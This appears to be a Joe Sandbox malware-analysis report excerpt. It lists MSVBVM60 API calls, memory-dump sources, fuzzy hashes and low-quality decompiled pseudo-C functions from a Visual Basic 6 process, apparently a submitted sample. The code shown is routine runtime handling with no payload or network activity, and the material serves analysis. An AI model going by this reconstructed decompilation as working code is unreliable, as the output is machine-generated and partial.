                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckErrorHresultSystem
                                                        • String ID: Alignment
                                                        • API String ID: 2264031751-2923404543
                                                        • Opcode ID: dc9cc831a350e70b12bc6104fe780c11d2e265c18d42919cb1b26b97fa8e92cb
                                                        • Instruction ID: ed251a81bb9f025d8f6a7ed8ee99042b48a82243ff9eb9e6aea26528592e4486
                                                        • Opcode Fuzzy Hash: dc9cc831a350e70b12bc6104fe780c11d2e265c18d42919cb1b26b97fa8e92cb
                                                        • Instruction Fuzzy Hash: 1F216A74A00604EFC710EF69C989A8ABBF8FF58700F10856AF989E7751D774A840CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • #593.MSVBVM60(?), ref: 0041C81D
                                                        • __vbaFPInt.MSVBVM60 ref: 0041C833
                                                          • Part of subcall function 0041DE40: __vbaNew2.MSVBVM60(0040B730,?,00000000,?,72A1A274), ref: 0041DE8C
                                                          • Part of subcall function 0041DE40: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,0000001C), ref: 0041DEB0
                                                          • Part of subcall function 0041DE40: __vbaFreeVar.MSVBVM60 ref: 0041DEB9
                                                          • Part of subcall function 0041DE40: __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DED2
                                                          • Part of subcall function 0041DE40: __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DEE6
                                                          • Part of subcall function 0041DE40: __vbaHresultCheckObj.MSVBVM60(00000000,72A1A237,00411158,00000020), ref: 0041DF09
                                                          • Part of subcall function 0041DE40: __vbaFreeVar.MSVBVM60 ref: 0041DF12
                                                          • Part of subcall function 0041DE40: __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DF22
                                                          • Part of subcall function 0041DE40: __vbaHresultCheckObj.MSVBVM60(00000000,72A1A237,00411158,00000024), ref: 0041DF43
                                                          • Part of subcall function 0041DE40: __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041DF4E
                                                        • __vbaFreeVarList.MSVBVM60(00000003,0000000A,00000004,?,?,004016D8,?), ref: 0041C862
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004016A0,00410B74,000006F8), ref: 0041C884
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresultNew2$Free$#593AddrefList
                                                        • String ID:
                                                        • API String ID: 2661231995-0
                                                        • Opcode ID: 8a0d7c4be2ad5797e010b10b687947322b5f077470a09713e3098923a522573a
                                                        • Instruction ID: 7cf3442aed4ff54f4037b68df471e0c1627cf3ecc9c5bfba7c8cb884a8becf0b
                                                        • Opcode Fuzzy Hash: 8a0d7c4be2ad5797e010b10b687947322b5f077470a09713e3098923a522573a
                                                        • Instruction Fuzzy Hash: CD21B0B1841208EFCB00EF95DE89ADEBBB9FF44701F20415AF445B3290D7786A41CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 17%
                                                        			E00415200(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				char _v28;
                                                        				char _v32;
                                                        				char _v36;
                                                        				void* _t21;
                                                        				void* _t24;
                                                        				void* _t27;
                                                        				intOrPtr* _t29;
                                                        				intOrPtr* _t38;
                                                        				intOrPtr* _t39;
                                                        				void* _t40;
                                                        				void* _t42;
                                                        				intOrPtr _t43;
                                                        
                                                        				_t43 = _t42 - 0xc;
                                                        				 *[fs:0x0] = _t43;
                                                        				_v16 = _t43 - 0x20;
                                                        				_v12 = 0x4012c0;
                                                        				_v8 = 0;
                                                        				_t38 = _a4;
                                                        				 *((intOrPtr*)( *_t38 + 4))(_t38, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t40);
                                                        				_v28 = 0;
                                                        				_v32 = 0;
                                                        				 *_a8 = 0;
                                                        				_v36 = 0;
                                                        				_t21 =  *((intOrPtr*)( *_t38 + 0x3b0))(_t38);
                                                        				_t29 = __imp____vbaObjSet;
                                                        				_t39 =  *_t29( &_v32, _t21);
                                                        				_t24 =  *((intOrPtr*)( *_t39 + 0x210))(_t39,  &_v36);
                                                        				asm("fclex");
                                                        				if(_t24 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t24, _t39, 0x410414, 0x210);
                                                        				}
                                                        				_v36 = 0;
                                                        				_t27 =  *_t29( &_v28, _v36);
                                                        				__imp____vbaFreeObj();
                                                        				_push(0x4152c3);
                                                        				return _t27;
                                                        			}


















                                                        0x00415203
                                                        0x00415212
                                                        0x0041521f
                                                        0x00415222
                                                        0x0041522b
                                                        0x0041522e
                                                        0x00415234
                                                        0x0041523b
                                                        0x0041523e
                                                        0x00415241
                                                        0x00415245
                                                        0x00415248
                                                        0x0041524e
                                                        0x0041525b
                                                        0x00415264
                                                        0x0041526c
                                                        0x0041526e
                                                        0x0041527c
                                                        0x0041527c
                                                        0x00415285
                                                        0x0041528d
                                                        0x00415292
                                                        0x00415298
                                                        0x00000000

                                                        APIs
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415259
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000210,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041527C
                                                        • __vbaObjSet.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041528D
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415292
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult
                                                        • String ID:
                                                        • API String ID: 444973724-0
                                                        • Opcode ID: e3d229ab81c3a6e0dd8030c1dcc339436d853f024d631e1fb596ae0ded67646b
                                                        • Instruction ID: bd36dc85601c0206c359d4f3cee15db34144bfa75d62af71fb66f3b2760b32f1
                                                        • Opcode Fuzzy Hash: e3d229ab81c3a6e0dd8030c1dcc339436d853f024d631e1fb596ae0ded67646b
                                                        • Instruction Fuzzy Hash: A7110A75900218EBCB009F99C989DDEBBFCFF98700F10455AF545E3261C77859418FA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 17%
                                                        			E00415B80(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				char _v28;
                                                        				char _v32;
                                                        				char _v36;
                                                        				intOrPtr* _t22;
                                                        				void* _t23;
                                                        				intOrPtr* _t35;
                                                        				intOrPtr* _t36;
                                                        				void* _t37;
                                                        				void* _t39;
                                                        				intOrPtr _t40;
                                                        
                                                        				_t40 = _t39 - 0xc;
                                                        				 *[fs:0x0] = _t40;
                                                        				_v16 = _t40 - 0x20;
                                                        				_v12 = 0x401330;
                                                        				_v8 = 0;
                                                        				_t35 = _a4;
                                                        				 *((intOrPtr*)( *_t35 + 4))(_t35, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t37);
                                                        				_v28 = 0;
                                                        				_v32 = 0;
                                                        				 *_a8 = 0;
                                                        				_v36 = 0;
                                                        				_t22 =  &_v36;
                                                        				__imp____vbaObjSet(_t22,  *((intOrPtr*)( *_t35 + 0x3b0))(_t35));
                                                        				_t36 = _t22;
                                                        				_t23 =  *((intOrPtr*)( *_t36 + 0x238))(_t36,  &_v32);
                                                        				asm("fclex");
                                                        				if(_t23 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t23, _t36, 0x410414, 0x238);
                                                        				}
                                                        				_v32 = 0;
                                                        				__imp____vbaStrMove();
                                                        				__imp____vbaFreeObj();
                                                        				_push(0x415c42);
                                                        				return _t23;
                                                        			}
















                                                        0x00415b83
                                                        0x00415b92
                                                        0x00415b9f
                                                        0x00415ba2
                                                        0x00415bab
                                                        0x00415bae
                                                        0x00415bb4
                                                        0x00415bbb
                                                        0x00415bbe
                                                        0x00415bc1
                                                        0x00415bc5
                                                        0x00415bcf
                                                        0x00415bd3
                                                        0x00415bd9
                                                        0x00415be2
                                                        0x00415bea
                                                        0x00415bec
                                                        0x00415bfa
                                                        0x00415bfa
                                                        0x00415c06
                                                        0x00415c09
                                                        0x00415c12
                                                        0x00415c18
                                                        0x00000000

                                                        APIs
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415BD3
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000238,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415BFA
                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415C09
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415C12
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresultMove
                                                        • String ID:
                                                        • API String ID: 2435256576-0
                                                        • Opcode ID: 298b69994adf7912561aadb9dbc36f2950abc1954b2e31f3cb4a3b0468f462e4
                                                        • Instruction ID: 3f06fbb17c0cfd88f78f21d93fa592b16deff16412cf33d1d5788e9d5483ffc5
                                                        • Opcode Fuzzy Hash: 298b69994adf7912561aadb9dbc36f2950abc1954b2e31f3cb4a3b0468f462e4
                                                        • Instruction Fuzzy Hash: DF112875900209EBCB009F95C989EEEFBB8FF98700F10816AF542A7260D7786945CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B730,?,?,00401700,00000000), ref: 0041E3C3
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028,?,00401700,00000000), ref: 0041E3E4
                                                        • __vbaVarTextTstEq.MSVBVM60(?,?,?,00401700,00000000), ref: 0041E3F5
                                                        • __vbaFreeVar.MSVBVM60(?,00401700,00000000), ref: 0041E400
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresultNew2Text
                                                        • String ID:
                                                        • API String ID: 2952808666-0
                                                        • Opcode ID: e08154e3b0b4eb461a917fc81dc165a394d150c27bd502896b2216b85a561c8b
                                                        • Instruction ID: 11546703d3100e9a83b5665738602d7ff57218a73727fba89aa87d467737ff6f
                                                        • Opcode Fuzzy Hash: e08154e3b0b4eb461a917fc81dc165a394d150c27bd502896b2216b85a561c8b
                                                        • Instruction Fuzzy Hash: 831170B5941208EBCB10DF55CA49ADEBBF8FF58741F20411AF945B3260D3786E45CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004225E5,00411580,0000001C,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00422005
                                                        • __vbaCastObjVar.MSVBVM60(?,004113E8,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00422014
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0042201F
                                                        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00422028
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CastCheckFreeHresult
                                                        • String ID:
                                                        • API String ID: 2379982908-0
                                                        • Opcode ID: c0bed996e35696c34b6a1cb64145536443b9a75c49ddb121482aef8a4c80a54e
                                                        • Instruction ID: 78fd0d4038b89ee32b583735ed36bf339507f3d4db6e6e2e62c21046bcdfa495
                                                        • Opcode Fuzzy Hash: c0bed996e35696c34b6a1cb64145536443b9a75c49ddb121482aef8a4c80a54e
                                                        • Instruction Fuzzy Hash: 65114F71A00209EFDB00DF95CA89EDEBBB8FF58701F10441AF641A31A0D7B8A941CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,0042277E,00411580,0000002C,?,?,?,?,?,?,?,00401D26), ref: 004220E1
                                                        • __vbaCastObj.MSVBVM60(?,00411928,?,?,?,?,?,?,?,00401D26), ref: 004220F0
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401D26), ref: 004220FB
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401D26), ref: 00422104
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CastCheckFreeHresult
                                                        • String ID:
                                                        • API String ID: 2379982908-0
                                                        • Opcode ID: 8d1d3dc7ed36d14cd2e5767834dfdd98317ea27dced9835cc24fb22943071a93
                                                        • Instruction ID: 3122528e231ee9733b64bebdc27a34127e3a96e9ede2eb1afaa1314ca064f70e
                                                        • Opcode Fuzzy Hash: 8d1d3dc7ed36d14cd2e5767834dfdd98317ea27dced9835cc24fb22943071a93
                                                        • Instruction Fuzzy Hash: 7B114FB0A00205AFCB009FA5CA49EAEFBB8EF54700F10851AF601E3260D678A941CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaCastObj.MSVBVM60(00000000,00411580,?,?,?,?,?,00401D26), ref: 00421D0B
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,00401D26), ref: 00421D16
                                                        • __vbaObjSetAddref.MSVBVM60(00401A9C,00000000,?,?,?,?,?,00401D26), ref: 00421D21
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421D2A
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$AddrefCastFree
                                                        • String ID:
                                                        • API String ID: 247606873-0
                                                        • Opcode ID: 8511083c08dd0da7740a4eed0660c5a16a5c2f5f82f0c2abd8aa876212357d87
                                                        • Instruction ID: 93f7e4e2509867c96e9c850529fd45bb3eededa373c10e89cfb45aaf5c5ae310
                                                        • Opcode Fuzzy Hash: 8511083c08dd0da7740a4eed0660c5a16a5c2f5f82f0c2abd8aa876212357d87
                                                        • Instruction Fuzzy Hash: 41017C71900219FBC7009F64DE49AAEBFB8EF44744F10802AF941A72A0C77869418BD8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew.MSVBVM60(00411590,?,?,?,?,?,00401D26), ref: 00421C5A
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,00401D26), ref: 00421C65
                                                        • __vbaObjSetAddref.MSVBVM60(00401A8C,00000000,?,?,?,?,?,00401D26), ref: 00421C70
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421C79
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$AddrefFree
                                                        • String ID:
                                                        • API String ID: 1411118827-0
                                                        • Opcode ID: bac2df534b84dd0d97f72c6f6a11b7235600f419f63e1a8bc645cf961f502211
                                                        • Instruction ID: c760e9d14c4b6ee96e6c70bbbfa237425ebefae8802f45d7b4e6313e357449e2
                                                        • Opcode Fuzzy Hash: bac2df534b84dd0d97f72c6f6a11b7235600f419f63e1a8bc645cf961f502211
                                                        • Instruction Fuzzy Hash: 8A018F75900619FBC7009F65DE49AAEBFB8FF44740F10802AF942A72A0D77859418BD9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 49%
                                                        			E00415020(intOrPtr* _a4, intOrPtr _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v36;
                                                        				intOrPtr* _t23;
                                                        				void* _t24;
                                                        				void* _t27;
                                                        				intOrPtr* _t28;
                                                        				void* _t31;
                                                        				void* _t41;
                                                        				intOrPtr* _t42;
                                                        				void* _t44;
                                                        				intOrPtr* _t45;
                                                        				intOrPtr _t47;
                                                        				intOrPtr _t48;
                                                        
                                                        				 *[fs:0x0] = _t47;
                                                        				_t48 = _t47 - 0x1c;
                                                        				_v16 = _t48;
                                                        				_v12 = 0x401298;
                                                        				_v8 = 0;
                                                        				_t45 = _a4;
                                                        				 *((intOrPtr*)( *_t45 + 4))(_t45, _t41, _t44, _t31,  *[fs:0x0], 0x401d26);
                                                        				_t6 = _t45 + 0x10; // 0x0
                                                        				_t23 =  *_t6;
                                                        				_t24 =  *((intOrPtr*)( *_t23 + 0x94))(_t23, _a8);
                                                        				asm("fclex");
                                                        				if(_t24 < 0) {
                                                        					_t9 = _t45 + 0x10; // 0x0
                                                        					__imp____vbaHresultCheckObj(_t24,  *_t9, 0x40f430, 0x94);
                                                        				}
                                                        				_t42 = _t48 - 0x10;
                                                        				 *_t42 = 8;
                                                        				 *((intOrPtr*)(_t42 + 4)) = _v36;
                                                        				 *(_t42 + 8) = L"Enabled";
                                                        				 *((intOrPtr*)(_t42 + 0xc)) = _v28;
                                                        				_t27 =  *((intOrPtr*)( *_t45 + 0x390))(_t45);
                                                        				asm("fclex");
                                                        				if(_t27 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t27, _t45, 0x40f430, 0x390);
                                                        				}
                                                        				_t28 = _a4;
                                                        				 *((intOrPtr*)( *_t28 + 8))(_t28);
                                                        				 *[fs:0x0] = _v24;
                                                        				return _v8;
                                                        			}




















                                                        0x00415032
                                                        0x00415039
                                                        0x0041503f
                                                        0x00415042
                                                        0x00415049
                                                        0x00415050
                                                        0x00415056
                                                        0x00415059
                                                        0x00415059
                                                        0x00415063
                                                        0x0041506b
                                                        0x0041506d
                                                        0x0041506f
                                                        0x0041507e
                                                        0x0041507e
                                                        0x0041508c
                                                        0x00415096
                                                        0x0041509b
                                                        0x0041509e
                                                        0x004150a4
                                                        0x004150a7
                                                        0x004150af
                                                        0x004150b1
                                                        0x004150bf
                                                        0x004150bf
                                                        0x004150c5
                                                        0x004150cb
                                                        0x004150d6
                                                        0x004150e1

                                                        APIs
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040F430,00000094,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041507E
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401298,0040F430,00000390,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004150BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: CheckHresult__vba
                                                        • String ID: Enabled
                                                        • API String ID: 2812612143-2672067096
                                                        • Opcode ID: 047bde23a4f64058e650f950df8c6932286bd150b9fa4352300021e1da0f8827
                                                        • Instruction ID: 63e245c3369f0da19d24a0ee3214163d12db9f1a269c04ff7424ee1be041dba9
                                                        • Opcode Fuzzy Hash: 047bde23a4f64058e650f950df8c6932286bd150b9fa4352300021e1da0f8827
                                                        • Instruction Fuzzy Hash: D5217C75A00204EFD710EF58C949B9ABBF8FB59700F108169F549E7790C778A805CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 45%
                                                        			E00423F10(void* __ebx, void* __esi, signed int _a4, intOrPtr _a8) {
                                                        				intOrPtr _v136;
                                                        				void _v248;
                                                        				void* _t18;
                                                        				void* _t19;
                                                        				void* _t24;
                                                        				signed int _t34;
                                                        				signed int _t35;
                                                        				void* _t38;
                                                        				void* _t40;
                                                        				void* _t41;
                                                        				void* _t42;
                                                        				void* _t43;
                                                        				void* _t45;
                                                        				void* _t47;
                                                        
                                                        				_push(__ebx);
                                                        				_push(__esi);
                                                        				memset( &_v248, 0, 0x3e << 2);
                                                        				_t47 = _t45 - 0xf8 + 0xc;
                                                        				_push( &_v248);
                                                        				_t38 = L00423E30(0, __esi, _a4);
                                                        				if(_t38 == 0) {
                                                        					L11:
                                                        					return 0;
                                                        				} else {
                                                        					_t34 = _a4;
                                                        					if(_t34 < 0 || _t34 >= _v136) {
                                                        						goto L11;
                                                        					} else {
                                                        						_t24 = E004240A0(_a8);
                                                        						if(_t34 >= 0x10) {
                                                        							__imp____vbaGenerateBoundsError();
                                                        						}
                                                        						_t18 = E004240A0(_t47 + 0x84 + _t34 * 8);
                                                        						_push(8);
                                                        						_push(_t18);
                                                        						_push(_t24);
                                                        						_t19 = E00424000();
                                                        						_t40 = _t38 + 4;
                                                        						if(_t40 < 0) {
                                                        							L12:
                                                        							__imp____vbaErrorOverflow();
                                                        							return _t19;
                                                        						}
                                                        						_t41 = _t40 + 0x14;
                                                        						if(_t41 < 0) {
                                                        							goto L12;
                                                        						}
                                                        						_t42 = _t41 + 0x60;
                                                        						if(_t42 < 0) {
                                                        							goto L12;
                                                        						}
                                                        						_t35 = _t34 * 8;
                                                        						if(_t35 < 0) {
                                                        							goto L12;
                                                        						}
                                                        						_t43 = _t42 + _t35;
                                                        						if(_t43 < 0) {
                                                        							goto L12;
                                                        						}
                                                        						return _t43;
                                                        					}
                                                        				}
                                                        				goto L14;
                                                        			}

















                                                        0x00423f1d
                                                        0x00423f1e
                                                        0x00423f24
                                                        0x00423f24
                                                        0x00423f31
                                                        0x00423f3a
                                                        0x00423f3e
                                                        0x00423faa
                                                        0x00423fb5
                                                        0x00423f40
                                                        0x00423f40
                                                        0x00423f49
                                                        0x00000000
                                                        0x00423f54
                                                        0x00423f64
                                                        0x00423f66
                                                        0x00423f68
                                                        0x00423f68
                                                        0x00423f76
                                                        0x00423f7b
                                                        0x00423f7d
                                                        0x00423f7e
                                                        0x00423f7f
                                                        0x00423f84
                                                        0x00423f87
                                                        0x00423fb8
                                                        0x00423fb8
                                                        0x00000000
                                                        0x00423fb8
                                                        0x00423f89
                                                        0x00423f8c
                                                        0x00000000
                                                        0x00000000
                                                        0x00423f8e
                                                        0x00423f91
                                                        0x00000000
                                                        0x00000000
                                                        0x00423f93
                                                        0x00423f96
                                                        0x00000000
                                                        0x00000000
                                                        0x00423f98
                                                        0x00423f9b
                                                        0x00000000
                                                        0x00000000
                                                        0x00423fa7
                                                        0x00423fa7
                                                        0x00423f49
                                                        0x00000000

                                                        APIs
                                                        • __vbaGenerateBoundsError.MSVBVM60(?,00000000,?,00000000), ref: 00423F68
                                                        • __vbaErrorOverflow.MSVBVM60(00000000,00000000,00000008,?,?,00000000,?,00000000), ref: 00423FB8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: Error__vba$BoundsGenerateOverflow
                                                        • String ID: PE
                                                        • API String ID: 1424794094-4258593460
                                                        • Opcode ID: 7e683a7f23016ded9c75a3eae36e4a533e2b89d256d572556637bb8bb1989003
                                                        • Instruction ID: ee684d460ff2dc50e2bc6bf9941486f5426afe25f019cbd12103b61d517e534d
                                                        • Opcode Fuzzy Hash: 7e683a7f23016ded9c75a3eae36e4a533e2b89d256d572556637bb8bb1989003
                                                        • Instruction Fuzzy Hash: 0F112CB3F0026167D6205A24FD44BABE37ADBD4352FC2443FE94893240D53DD94D87A5
                                                        Uniqueness

